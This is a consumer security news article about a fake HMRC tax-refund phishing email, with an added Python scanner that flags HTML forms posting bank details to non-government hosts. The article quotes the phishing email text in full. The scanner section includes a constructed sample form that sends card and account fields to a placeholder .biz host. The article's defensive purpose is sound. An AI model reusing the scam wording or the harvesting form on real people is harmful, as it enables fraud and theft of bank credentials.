Cybercriminals tap into tax to scam consumers

Evolving beyond long-lost uncles in Africa or winning the Spanish lottery, the latest phishing campaign centers around something we all love -- the arrival of a tax refund.

Cybercriminals, who delight in taking our money, are now using the lure of returned funds to scam us in the latest campaign to hit both our email and bank accounts.

In the United Kingdom, whether you are on payroll or self-employed, you pay tax through HM Revenue & Customs (HMRC). If you have overpaid and are due a refund, the agency contacts you through the post and sends you a cheque. However, as organizations now rely more on email and less on snail mail, the latest phishing campaign which poses as the HMRC doesn't sound implausible.

Researchers over at the Malwarebytes blog have discovered a new scam that targets U.K. consumers by emailing a fake HMRC tax refund form as an attachment, which harvests your personal and banking details once you open and fill it in. The phishing email is below:

[Screenshot: the phishing email (captured 2013-12-10)]

Within the email, the scammers -- posing as the HMRC -- say:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show you have made over payments of GBP 323.56 Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application.

In order to process your refund you will need to complete the attached application form. Your refund may take up to 3 weeks to process please make sure you complete the form correctly.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

Regards, HM Revenue & Customs

Several clues give this 'refund' away as fake. The small grammar mistakes, and the claim that the telephone helpline is "unable" to assist with the refund, both point to a scam: the ringleaders would rather you did not talk to an actual member of HMRC staff, who would be able to shoot down the campaign on the spot.

The information requested within the attachment includes your full name, address, date of birth, card number, sort code, account number, telephone, verification code and more -- all extremely valuable data which could allow your account to be cleaned out -- not the best idea coming up to Christmas.

However, when you try to submit the form, there is a glaring spelling mistake on the button: it says "Submit informations," which should ring more alarm bells -- but not every consumer will notice it. The researchers say that hitting the submit button posts the entered information to a URL on a .biz domain, which appears to be a compromised site.

[Screenshot: the fake refund form's "Submit informations" button (captured 2013-12-11)]
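As an added illustration (not code from the article or from Malwarebytes), the following Python scans an HTML attachment for the pattern described above: a form that collects bank details and posts them to a host outside gov.uk. The sample attachment and its .biz host name are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Fragments marking bank-credential fields the article says the fake form collects.
SENSITIVE_FRAGMENTS = ("card", "sort", "account", "birth", "dob", "verification", "cvv")
# A genuine HMRC form would only ever post back to a government host.
TRUSTED_SUFFIXES = (".gov.uk",)

class FormScanner(HTMLParser):
    """Collect every <form> in the attachment with its action URL and input names."""
    def __init__(self):
        super().__init__()
        self.forms, self._current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": [], "submit": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "submit":
                self._current["submit"].append(a.get("value") or "")
            elif a.get("name"):
                self._current["fields"].append(a["name"].lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def scan_attachment(html: str) -> list:
    """One finding per form: where it posts and which sensitive fields it harvests."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        external = bool(host) and not host.endswith(TRUSTED_SUFFIXES)
        sensitive = sorted({f for f in form["fields"] if any(k in f for k in SENSITIVE_FRAGMENTS)})
        findings.append({"action_host": host, "posts_externally": external,
                         "sensitive_fields": sensitive, "submit_labels": form["submit"],
                         # flag a form shipping two or more bank details to a non-government host
                         "suspicious": external and len(sensitive) >= 2})
    return findings

# Constructed sample modelled on the article's description; the .biz host is a placeholder.
SAMPLE = """<html><body><form method="post" action="http://placeholder-refund.biz/submit.php">
<input name="full_name"><input name="address"><input name="date_of_birth">
<input name="card_number"><input name="sort_code"><input name="account_number">
<input name="telephone"><input name="verification_code">
<input type="submit" value="Submit informations"></form></body></html>"""

print(scan_attachment(SAMPLE))
```

The same scanner can be pointed at any HTML attachment pulled from a mail gateway; a legitimate form posting back to a gov.uk host comes out with `suspicious` set to False.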

The golden rule? HMRC will never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email.